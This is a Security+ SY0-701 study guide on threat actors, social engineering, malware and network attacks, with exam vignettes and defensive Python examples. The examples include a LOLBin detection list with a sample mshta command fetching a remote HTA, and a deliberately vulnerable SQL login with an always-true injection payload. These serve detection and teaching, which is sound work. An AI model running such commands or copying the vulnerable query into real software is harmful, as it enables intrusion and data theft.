CompTIA Security+ SY0-701 · Domain 2

Threat Actors & Attack Types
Who · Social Engineering · Malware · Network Attacks

Master threat actor attributes, social engineering tactics, malware taxonomy, and network attack techniques — with an interactive quiz and threat identifier tool built for SY0-701 scenario questions.
The Threat Landscape

Security+ SY0-701 tests your ability to identify threat actors and classify attack types in scenario questions. Domain 2 (Threats, Vulnerabilities, and Mitigations) is 22% of the exam.

Exam strategy: Security+ scenario questions give you a description and ask you to identify the attack type or threat actor. Focus on the distinguishing attribute of each — motivation for threat actors, delivery mechanism for attacks.
Threat Actors

Who Is Attacking?

Classified by motivation, capability, and resources. Understanding the why helps predict tactics, techniques, and procedures (TTPs).

Nation-state: Espionage, sabotage, APT
Insider threat: Privilege abuse, revenge
Hacktivist: Ideological, disruption
Organized Crime: Financial gain, ransomware

Social Engineering

Manipulating Humans

Exploits psychological principles — authority, urgency, fear — rather than technical vulnerabilities. People are the primary attack surface.

Phishing: Bulk deceptive email
Spear phishing: Targeted, personalized
Vishing/Smishing: Phone/SMS-based
Pretexting: Fabricated scenario

Malware

Malicious Software

Classified by how it spreads, what it does, and how it hides. Understanding the taxonomy is critical for Security+ scenario questions.

Ransomware: Encrypts + extorts
Worm: Self-replicates, no user action
Rootkit: Hides deep in OS
Trojan: Disguised as legitimate

Network & App Attacks

Exploiting Infrastructure

Technical attacks targeting network protocols, authentication systems, and application input validation.

DDoS: Overwhelm with traffic
On-path (MITM): Intercept comms
SQL injection: Malicious DB queries
Pass-the-hash: Reuse captured hashes

The SY0-701 Exam Mindset

Security+ tests application, not just memorization. A question will describe a scenario and ask "what type of attack is this?" or "which threat actor is most likely responsible?" — you need to identify the distinguishing detail that classifies it.

Attribute framework for threat actors (SY0-701): Every threat actor is evaluated on three dimensions — Internal vs. External, Resources/Funding, and Sophistication/Capability. Additionally, SY0-701 tests 10 official motivations: data exfiltration, espionage, service disruption, blackmail, financial gain, philosophical/political beliefs, ethical, revenge, disruption/chaos, and war.
Threat Actor Profiles & Attack Taxonomies

The details that distinguish each actor type and attack category on SY0-701 scenario questions.

Threat Actor Profiles: Who's Attacking

Nation-State / APT

Government-sponsored. Most sophisticated and well-funded. Advanced Persistent Threat — long-term, stealthy presence.

Motivation: Espionage · Sabotage · Political

Insider Threat

Current/former employee or contractor with legitimate access. Hardest to detect — bypasses perimeter controls.

Motivation: Revenge · Financial · Negligence

Hacktivist

Attacks driven by ideology or political beliefs. Targets: government, corporations, controversial organizations.

Motivation: Ideological · Political protest

Organized Crime

Financially motivated criminal groups operating at scale. Deploy ransomware, BEC fraud, credential theft, and sell stolen data on dark web markets.

Motivation: Financial gain · Blackmail

Unskilled Attacker

Uses pre-built scripts and tools without deep technical understanding. Opportunistic — scans for known vulnerabilities rather than targeting specific organizations.

Motivation: Curiosity · Notoriety · Disruption

Shadow IT

Employees or departments using unauthorized apps, cloud services, or devices without IT approval. Creates inadvertent security gaps — not always malicious in intent.

Risk: Unmanaged attack surface · Data exposure
Actor | Internal/External | Sophistication | Resources | Typical TTPs
Nation-State | External | Very High | Very High | Zero-days, supply chain attacks, long-term persistence
Insider Threat | Internal | Varies | Varies (privileged access) | Data exfiltration, sabotage, privilege abuse
Hacktivist | External | Medium | Low–Medium | DDoS, website defacement, data leaks
Organized Crime | External | Medium–High | Medium–High | Ransomware, phishing, BEC, credential theft, data brokering
Unskilled Attacker | External | Low | Low | Pre-built exploit tools, port scanning, opportunistic vulnerability exploitation
Shadow IT | Internal | Low (unintentional) | Varies | Unauthorized SaaS apps, personal cloud storage, unmanaged devices — creates unmonitored attack surface

Official SY0-701 Threat Actor Categories (Objective 2.1): CompTIA's exam objectives list exactly six: Nation-State, Unskilled Attacker, Hacktivist, Insider Threat, Organized Crime, Shadow IT. Memorize this list — questions may ask you to identify which category a scenario describes. Shadow IT is unique because it is internal and typically unintentional, yet still creates real security risk.

10 Official Motivations (SY0-701 Obj. 2.1): Data exfiltration · Espionage · Service disruption · Blackmail · Financial gain · Philosophical/political beliefs · Ethical · Revenge · Disruption/chaos · War. The exam may present a motivation and ask you to match it to a threat actor type.

Social Engineering Attacks: Exploiting People

Phishing
Bulk deceptive email pretending to be a trusted entity. Generic targets, mass distribution. Often uses spoofed domains.
Spear Phishing
Targeted phishing at a specific individual or organization. Uses personal details to appear legitimate. Higher success rate than generic phishing.
Whaling
Spear phishing targeting executives (CEO, CFO). High-value targets. Often requests large wire transfers or sensitive data.
Vishing
Voice phishing — phone calls impersonating IT support, banks, IRS. Uses urgency and authority to extract credentials or financial information.
Smishing
SMS-based phishing. Malicious links or requests sent via text message. Often impersonates delivery services, banks, or government agencies.
Business Email Compromise (BEC)
Impersonates a trusted executive or vendor via email. Common goal: authorize fraudulent wire transfers. Often combined with spear phishing.
Pretexting
Attacker creates a fabricated scenario (pretext) to extract information. Example: posing as IT support to get a password reset.
Baiting
Physical or digital lure. Example: USB drives left in parking lots labeled "Salary 2026" — curiosity causes victims to plug them in.
Tailgating / Piggybacking
Physically following an authorized person through a secure door. Tailgating = without consent; piggybacking = victim knowingly holds door (social pressure).
Watering Hole
Attacker compromises a website frequently visited by the target group. When victims visit the site, malware is delivered. Hard to detect.
Typosquatting
Registering domains similar to legitimate sites (e.g., "g00gle.com"). Captures traffic from users who mistype URLs. Used for credential harvesting.
Shoulder Surfing
Observing a victim entering credentials or sensitive data in person (or via camera). Physical threat, not electronic.
6 Principles of Influence (Cialdini) — social engineering exploits these: Authority · Urgency · Scarcity · Familiarity / Liking · Social Proof · Intimidation
On the exam: "The caller claimed to be the CEO and said the wire transfer was urgent" = Authority + Urgency.

Malware Types: Malicious Software

Virus
Requires a host file to spread. Needs user action to execute (opening an infected file). Attaches to legitimate programs.
Worm
Self-replicates and spreads autonomously — no user action needed. Exploits network vulnerabilities. Can consume bandwidth rapidly.
Trojan
Disguised as legitimate software. Doesn't self-replicate. Creates backdoors for remote access. Often delivered via social engineering.
Ransomware
Encrypts victim's files and demands ransom for the decryption key. Modern variant: double extortion — also threatens to publish stolen data.
Rootkit
Hides itself and other malware deep in the OS (kernel level). Extremely difficult to detect and remove. May require offline scanning or OS reinstall.
Keylogger
Records keystrokes silently. Captures passwords, credit cards, sensitive data. Can be hardware (USB device) or software.
Spyware
Secretly collects user data (browsing habits, credentials) and sends it to attacker. Often bundled with free software.
Botnet / C2
Network of compromised machines (bots/zombies) controlled by a command-and-control (C2) server. Used for DDoS, spam, credential stuffing.
Logic Bomb
Malicious code that triggers on a specific condition (date, event, or action). Often planted by insiders. Example: delete files if employee ID is removed.
Fileless Malware
Resides entirely in memory (RAM), leaving no file on disk. Evades traditional signature-based AV. Uses legitimate OS tools (LOLBins) to execute.
RAT (Remote Access Trojan)
Trojan that provides the attacker with remote control of the infected machine. Enables keylogging, screen capture, file access, and lateral movement.
Cryptojacker
Uses victim's CPU/GPU to mine cryptocurrency without consent. Slows system performance. May be browser-based or installed malware.
Exam trap — Virus vs. Worm: The key distinction is the spread mechanism. A virus requires a host file AND user action to spread. A worm spreads on its own by exploiting vulnerabilities — no user action needed. If the question says "spread across the network without anyone clicking anything" = worm.
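The fileless malware entry notes that these payloads run through legitimate OS tools (LOLBins) and slip past signature-based AV, which is why defenders look at process behaviour rather than file hashes. The following is an added example written for this page, not code from the study guide: it runs three behavioural rules over constructed Sysmon-style process-creation events, flagging a commonly abused Windows binary spawned by an Office application, PowerShell launched with an encoded command, and an abused binary whose command line fetches a URL. The LOLBin list, the event field names and the sample events are assumptions chosen for illustration; a production rule set is tuned against the environment's own baseline.

```python
import re

# Windows binaries commonly abused by fileless malware (assumed list for the
# demo; the public LOLBAS project maintains the full catalogue).
LOLBINS = {"powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_FLAG = re.compile(r"\s-(?:enc|encodedcommand|ec|e)\s", re.I)
HAS_URL = re.compile(r"https?://", re.I)

# Constructed Sysmon-style process-creation events (sample data, not a capture).
# The encoded PowerShell argument is a truncated placeholder, not a decodable payload.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe Q3_report.docx"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQ..."},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.7/update.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
]


def evaluate(event):
    """Return the names of the behavioural rules this event trips (empty if none)."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]
    findings = []
    # Rule 1: a document viewer has no business spawning a script host.
    if image in LOLBINS and parent in OFFICE_PARENTS:
        findings.append("lolbin-spawned-by-office")
    # Rule 2: encoded PowerShell hides the script body from command-line logging.
    if image == "powershell.exe" and ENCODED_FLAG.search(cmdline):
        findings.append("encoded-powershell")
    # Rule 3: an abused binary pulling content from a URL stages code with no file on disk.
    if image in LOLBINS and HAS_URL.search(cmdline):
        findings.append("lolbin-fetches-url")
    return findings


def triage(events):
    """Return [(index, findings)] for the events that tripped at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := evaluate(e))]


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", findings)
```

The last sample event (PowerShell started from Explorer with a plain command) trips nothing, which is the point of behavioural rules: the tool itself is not the indicator, the parent process and the shape of the command line are.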

Network & Application Attacks: Technical Exploitation

DoS / DDoS
Denial of Service — overwhelm a target with traffic to make it unavailable. DDoS uses a distributed botnet. Amplification attacks (DNS, NTP) multiply traffic volume.
On-Path Attack (MITM)
Attacker positions between communicating parties to intercept, read, or alter traffic. Enabled by ARP poisoning, DNS spoofing, or rogue access points.
Replay Attack
Attacker captures a valid authentication token/credential and retransmits it to authenticate. Countered by timestamps, nonces, and session tokens.
SQL Injection
Injects malicious SQL commands into input fields to manipulate backend databases. Can dump, alter, or delete data. Countered by parameterized queries / prepared statements.
Cross-Site Scripting (XSS)
Injects malicious client-side scripts into web pages viewed by other users. Stored XSS persists in the database; Reflected XSS is immediate. Steals session cookies.
Pass-the-Hash
Attacker captures an NTLM password hash and uses it directly to authenticate — without knowing the plaintext password. Lateral movement technique in Windows environments.
Credential Stuffing
Uses large lists of leaked username/password pairs from one breach to try accessing other services. Exploits password reuse. Countered by MFA and breach monitoring.
DNS Poisoning / Spoofing
Corrupts a DNS cache to redirect users to attacker-controlled IP addresses. Victims believe they are visiting legitimate sites. Enables credential harvesting.
ARP Poisoning
Sends fake ARP replies to associate attacker's MAC address with a legitimate IP. Enables MITM attacks on local network segments. Countered by Dynamic ARP Inspection (DAI).
Buffer Overflow
Writes more data to a buffer than it can hold, overwriting adjacent memory. Can allow arbitrary code execution. Countered by input validation, ASLR, DEP/NX.
Brute Force / Dictionary
Systematically try all passwords (brute force) or common passwords from a list (dictionary). Countered by account lockout, MFA, and strong password policies.
Rainbow Table
Precomputed table of hash values used to reverse password hashes. Countered by salting hashes — adding a random value before hashing makes precomputed tables useless.
On-path vs. MITM: CompTIA updated the terminology in SY0-701. "On-path attack" is the preferred term for what was previously called "man-in-the-middle (MITM)." Both mean the same thing — the exam may use either term.
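The SQL Injection entry above names parameterized queries / prepared statements as the countermeasure. The following added example, written for this page rather than taken from the study guide, shows why the fix works, using Python's standard-library sqlite3 against a constructed two-row users table: the same "always true" input that returns every row from a string-built query returns nothing from a prepared statement with bound parameters. The table, the users and the payload are all constructed for the demo; a real system would also store salted password hashes rather than the plaintext used here to keep the example short.

```python
import sqlite3

# Constructed sample users for the demo (plaintext passwords only to keep the
# example short; a real system stores salted password hashes).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The 'before' form: SQL assembled by string formatting. Whatever the user
    typed is parsed as part of the query text, so a quote character lets the
    input change the query's structure instead of just its values."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, username, password):
    """The hardened form: a prepared statement with bound parameters. The
    query text is fixed; the driver passes the values separately, so they are
    compared as data and never interpreted as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def demo():
    """Run the classic always-true payload through both forms.

    The string-built query becomes
      ... WHERE username = 'nobody' AND password = '' OR '1'='1'
    and returns every user; the parameterized query looks for that exact
    string as a password and returns nothing."""
    conn = make_db()
    payload = "' OR '1'='1"  # constructed test input, not a real credential
    leaked = login_vulnerable(conn, "nobody", payload)
    safe = login_parameterized(conn, "nobody", payload)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("string-built query returned:", leaked)   # every user
    print("parameterized query returned:", safe)    # nothing
```

Both functions still authenticate a genuine user correctly; the only behavioural difference is on hostile input, which is what makes the parameterized form a drop-in replacement rather than a redesign.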
Side-by-Side Comparison

Focus on the distinguishing attributes used in exam scenarios.

Criterion | Threat Actors | Social Engineering | Malware | Network Attacks
Primary Target | Organizations, governments, individuals — based on actor motivation | The human — bypasses technical controls entirely | Endpoints, servers, infrastructure | Network infrastructure, applications, protocols
Attack Vector | Varies by actor type and motivation | Email, phone, SMS, physical, in-person | Email attachments, drive-by downloads, USB, exploitation | Network traffic, protocols, web application input
Key Differentiator | Motivation distinguishes actor type (financial vs. political vs. ideological) | Exploits psychological principles, not technical flaws | Spread method + payload defines malware type | Protocol/layer exploited (network, app, auth)
Sophistication Level | Unskilled attacker (low) → Nation-state (very high) | Low–High (from generic phishing to BEC) | Low (basic virus) → High (fileless, rootkit) | Moderate (DDoS) → High (pass-the-hash, zero-day)
Hardest to Detect | Nation-state APT (persistent, slow, stealthy) | Watering hole + pretexting (no suspicious email) | Fileless malware + rootkit (no disk artifacts) | On-path / ARP poisoning (passive eavesdropping)
Primary Countermeasure | Threat intelligence, zero trust, insider threat programs | Security awareness training, MFA, email filtering | EDR/AV, application allowlisting, patch management | Firewalls, IDS/IPS, input validation, salting/hashing
Exam Keyword | "government-sponsored," "ideological," "disgruntled employee" | "urgent," "CEO email," "USB in parking lot," "phone call" | "encrypts," "no user action needed," "hides in kernel" | "intercept," "overwhelm," "inject," "replay," "hash"
Notable Example | Nation-state: SolarWinds supply chain attack (APT) | BEC: $47M wire fraud via spoofed CEO email (2015) | Ransomware: Colonial Pipeline — DarkSide group (2021) | DDoS: Dyn DNS attack via Mirai botnet (2016)
Exam-Style Vignettes

Read each scenario and identify the attack type before revealing the breakdown — just like SY0-701 scenario questions.

Social Engineering: The "Urgent CEO" Email
"An employee in accounting receives an email appearing to be from the CEO. The email says: 'I'm in a board meeting and can't talk — I need you to urgently wire $85,000 to a new vendor by 3pm today or we lose the contract. Don't discuss this with anyone.' The sender's domain is 'acmec0rp.com' instead of 'acmecorp.com'."
Attack type: Business Email Compromise (BEC) — a form of spear phishing targeting financial processes
Principles exploited: Authority (CEO), urgency (3pm deadline), scarcity (lose the contract), isolation ("don't discuss")
Indicator: Typosquatted domain "acmec0rp.com" — zero substituted for the letter 'o'
Countermeasure: Out-of-band verification for wire transfers, DMARC/DKIM email authentication, security awareness training
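The indicator in this vignette is the typosquatted domain "acmec0rp.com", the same trick the Typosquatting entry in the social engineering section describes. As an added example written for this page (not code from the study guide), the following Python check folds common digit-for-letter substitutions back to the letters they imitate and measures edit distance against a constructed list of trusted domains, so a mail gateway or SIEM rule can flag lookalike senders before the message reaches accounting. The trusted-domain list, the homoglyph map and the sample From: headers are assumptions built for the demo. DMARC/DKIM, also listed as a countermeasure, authenticates the domain actually used; a registered lookalike domain can pass its own DMARC, so a lookalike check complements rather than replaces it.

```python
import re

# Constructed list of domains the organisation trusts (own domain plus a vendor).
TRUSTED_DOMAINS = {"acmecorp.com", "vendor-example.com"}

# Digit-for-letter and letter-pair substitutions commonly seen in lookalike
# domains. Assumed starter list; extend it from your own incident history.
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w"}

FROM_DOMAIN = re.compile(r"@([A-Za-z0-9.-]+)")


def normalize(domain):
    """Fold homoglyphs back to the letters they imitate, e.g. acmec0rp -> acmecorp.
    Legitimate domains that contain digits need an allowlist before this step."""
    domain = domain.lower()
    for fake, real in HOMOGLYPHS.items():
        domain = domain.replace(fake, real)
    return domain


def levenshtein(a, b):
    """Edit distance: each insertion, deletion or substitution counts as 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(from_header):
    """Extract the domain from a From: header value such as 'CEO <ceo@acmec0rp.com>'."""
    m = FROM_DOMAIN.search(from_header)
    return m.group(1).lower().rstrip(".") if m else None


def classify_sender(from_header, trusted=TRUSTED_DOMAINS, max_distance=1):
    """Return 'trusted', 'external', 'unparseable' or 'lookalike of <domain>'.

    A domain is a lookalike if, after homoglyph folding, it equals a trusted
    domain or sits within max_distance edits of one (acmecorp.co, acme-corp.com)."""
    domain = sender_domain(from_header)
    if domain is None:
        return "unparseable"
    if domain in trusted:
        return "trusted"
    folded = normalize(domain)
    for t in sorted(trusted):
        if folded == t or levenshtein(folded, t) <= max_distance:
            return f"lookalike of {t}"
    return "external"


# Constructed sample From: headers for the demo.
SAMPLE_HEADERS = [
    "CEO <ceo@acmec0rp.com>",        # the vignette's domain: zero for 'o'
    "Alice <alice@acmecorp.com>",    # genuine
    "Billing <ap@acme-corp.com>",    # one inserted character
    "Newsletter <news@example.org>", # unrelated external sender
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(f"{h:32} -> {classify_sender(h)}")
```

Keep the edit-distance threshold small: at 1 it catches single substitutions, insertions and deletions, while at 2 or more short trusted domains start colliding with unrelated legitimate senders.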
Malware: Files Disappeared, Ransom Note Appeared
"A hospital's file server shows all patient records now have a '.locked' extension and cannot be opened. A text file on the desktop reads: 'Your files are encrypted. Pay 50 BTC to recover them. Additionally, we have exfiltrated 3TB of patient data and will publish it if payment is not received within 72 hours.'"
Malware type: Ransomware — specifically double extortion ransomware (encrypt + threaten to publish)
Threat actor: Most likely cybercriminal / organized crime (financial motivation; healthcare is a high-value target)
Key term: "Double extortion" = encrypt files AND exfiltrate data as a second leverage point
Countermeasure: Immutable offsite backups, network segmentation, EDR, incident response plan
Network Attack: The Compromised Coffee Shop
"A security analyst notices that all laptops on the corporate guest Wi-Fi are sending traffic through an unfamiliar MAC address. ARP tables show a single MAC mapped to multiple IP addresses. Users on the network later report their credentials were used to access corporate systems from overseas IP addresses."
Attack type: ARP poisoning enabling an on-path (MITM) attack — attacker redirected all traffic through their device
Indicator: Single MAC address mapped to multiple IPs in the ARP table = ARP poisoning signature
Follow-on attack: Credential theft from intercepted traffic → credential stuffing or direct unauthorized access
Countermeasure: Dynamic ARP Inspection (DAI), VPN enforcement on all networks, 802.1X port authentication
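The indicator in this vignette, a single MAC address mapped to several IPs in the ARP table, is easy to check mechanically. The added example below was written for this page and is not code from the study guide: it parses a constructed arp -a style dump, groups entries by MAC, reports any MAC claiming two or more IPs, and also compares the gateway's MAC against a known inventory value, since a gateway whose MAC suddenly changes is the other common sign of poisoning. The addresses, MACs and baseline are constructed sample data. A router doing proxy ARP can legitimately answer for many IPs, so the threshold is a tuning knob, and the page's countermeasure, Dynamic ARP Inspection, stops this at the switch rather than after the fact.

```python
import re
from collections import defaultdict

# Constructed ARP cache in Linux `arp -a` format (sample data, not a real capture).
SAMPLE_ARP = """\
gateway (10.20.0.1) at 00:11:22:33:44:55 [ether] on wlan0
? (10.20.0.12) at de:ad:be:ef:00:01 [ether] on wlan0
? (10.20.0.13) at de:ad:be:ef:00:01 [ether] on wlan0
? (10.20.0.14) at de:ad:be:ef:00:01 [ether] on wlan0
? (10.20.0.25) at 5c:aa:bb:cc:dd:ee [ether] on wlan0
? (10.20.0.99) at <incomplete> on wlan0
"""

# Constructed inventory baseline: the MAC the default gateway is known to use.
KNOWN_GATEWAY = ("10.20.0.1", "00:11:22:33:44:55")

ARP_ENTRY = re.compile(
    r"\((\d{1,3}(?:\.\d{1,3}){3})\) at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I
)


def parse_arp(text):
    """Return (ip, mac) pairs from arp -a output; <incomplete> entries are skipped."""
    pairs = []
    for line in text.splitlines():
        m = ARP_ENTRY.search(line)
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


def find_shared_macs(pairs, min_ips=2):
    """Group by MAC and return those answering for min_ips or more addresses.
    This is the 'single MAC mapped to multiple IPs' signature from the vignette;
    a router doing proxy ARP is the usual benign cause, hence the tunable threshold."""
    by_mac = defaultdict(set)
    for ip, mac in pairs:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) >= min_ips}


def gateway_mac_changed(pairs, baseline=KNOWN_GATEWAY):
    """True if the gateway IP is present but none of its entries carry the known MAC."""
    ip, known_mac = baseline
    seen = {mac for entry_ip, mac in pairs if entry_ip == ip}
    return bool(seen) and known_mac not in seen


def analyze(text, baseline=KNOWN_GATEWAY):
    """Run both checks and return the findings a SIEM rule could emit."""
    pairs = parse_arp(text)
    return {
        "entries": len(pairs),
        "shared_macs": find_shared_macs(pairs),
        "gateway_mac_changed": gateway_mac_changed(pairs, baseline),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_ARP))
```

In the sample the gateway still carries its inventoried MAC, so only the shared-MAC rule fires; swapping the gateway's MAC for the suspicious one trips the second rule as well, which is the pattern seen when the attacker impersonates the gateway to capture outbound traffic.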
Threat Actor: Months in the Network Undetected
"A forensic investigation reveals that an attacker had been inside a defense contractor's network for 14 months before detection. They used zero-day exploits, moved laterally using legitimate admin credentials, exfiltrated classified project documents slowly over encrypted channels, and left no obvious malware signatures."
Threat actor: Nation-state / Advanced Persistent Threat (APT) — long dwell time, sophisticated TTPs, zero-days, no financial demand
Key indicators: Zero-day use, 14-month dwell time, slow exfiltration, use of legitimate tools (living off the land)
Motivation: Espionage — classified defense information has political/military value, not financial
Countermeasure: Zero trust architecture, behavioral analytics (UEBA), threat hunting, privileged access management

Common exam traps: (1) "USB dropped in parking lot" = baiting (not just social engineering generically). (2) "Spread across network without user interaction" = worm (not virus). (3) "Used captured hash to authenticate" = pass-the-hash (not brute force — the password was never cracked). (4) "Government-sponsored, long-term, stealthy" = nation-state APT (not hacktivist — hacktivists want visibility).
Threat Identifier Tool

Answer 3 questions to identify the attack type or threat actor in your scenario — built around real SY0-701 question patterns.

What is the primary attack vector in the scenario?
    Where did the attack originate — email/phone, installed software, or the network itself?
How did the attacker make contact?
    The delivery method is the key differentiator for social engineering sub-types.
Was the email targeted at a specific person or sent broadly?
What was the apparent goal of the targeted email?
What did the physical attack involve?
What is the primary behavior of the malware?
How did the malware spread?
What is the primary effect of the network/application attack?
What is the attacker's apparent motivation?
How sophisticated is the attack?
Memory Hooks & Mnemonics

Social Engineering
Phishing → Spear Phishing → Whaling: what's the difference?
Generic → Targeted → Executive
Phishing = anyone. Spear = specific person. Whaling = big fish (exec/CEO). The more targeted, the more personalized, the more dangerous.

Malware
Virus vs. Worm — what's the key difference?
Virus needs a HOST + a CLICK. Worm needs NEITHER.
Virus = attaches to a file, needs user to open it. Worm = spreads on its own by exploiting vulnerabilities. "No user action" on the exam = worm.

Threat Actors
How do you remember nation-state vs. hacktivist?
Nation-state HIDES. Hacktivists ANNOUNCE.
Nation-state APTs want to stay undetected for months/years (espionage). Hacktivists want publicity — they deface websites and leak data to make a point. Visibility is the tell.

Network Attacks
Pass-the-hash vs. brute force vs. rainbow table?
Brute: TRY all. Rainbow: LOOK UP. Pass-the-hash: USE the hash directly.
Pass-the-hash never cracks the password — it authenticates using the captured hash value itself. If the exam says "without knowing the plaintext password" = pass-the-hash.

Social Engineering
What 6 psychological principles do attackers exploit?
AU·S·FIS: Authority, Urgency, Scarcity, Familiarity, Intimidation, Social proof
"This is your BANK (authority) — your account will be CLOSED (urgency) unless you verify NOW (scarcity)." Two or more combined = stronger attack.

Malware
What is a logic bomb and who usually plants one?
"Time bomb planted by an insider"
Logic bomb = malicious code that triggers on a condition (date, event). Who plants it? Disgruntled insiders. Exam clue: "code set to execute when the employee's account was deleted" = logic bomb.

Malware
What is double extortion ransomware?
Encrypt + Threaten to Leak = Double Extortion
Traditional ransomware only encrypts. Double extortion also exfiltrates data and threatens to publish it. Backups alone don't solve it — the data exposure threat remains.

Network Attacks
Watering hole vs. typosquatting — what's the difference?
Watering hole = REAL site you hack. Typosquatting = FAKE site you register.
Watering hole: compromise a legitimate website the target visits. Typosquatting: register "g00gle.com" to catch typo traffic. Both deliver victims to attacker-controlled content.

SY0-701 Quick-Recall Cheat Sheet

If the exam says… | Key detail | Answer
"Government-sponsored," "zero-day," "14-month dwell time" | Long-term, stealthy, political | Nation-state / APT
"Disgruntled employee," "planted code," "deleted records on last day" | Internal + privileged access | Insider Threat
"No user action needed," "spread across network automatically" | Self-replication | Worm
"Encrypts files," "ransom note," "also exfiltrated data" | Encrypt + leak threat | Double Extortion Ransomware
"Hides itself," "AV finds nothing," "kernel-level" | Deep OS hiding | Rootkit
"Captured hash," "authenticated without cracking password" | Uses hash directly | Pass-the-Hash
"Flooded with traffic from thousands of IPs" | Distributed sources | DDoS (Botnet)
"USB left in parking lot," "labeled Payroll" | Physical lure | Baiting
"CEO email, urgent wire transfer, slightly wrong domain" | Financial fraud via email | BEC / Spear Phishing
"Phone call, claimed to be IT support, asked for password" | Voice + authority | Vishing + Pretexting
"Opportunistic," "downloaded tools," "ran a script," "no specific target" | Official SY0-701 term | Unskilled Attacker
"Ransomware group," "organized," "financial motive," "RaaS" | Official SY0-701 term | Organized Crime
"Unauthorized Dropbox," "personal cloud storage," "unapproved SaaS" | Internal, unintentional risk | Shadow IT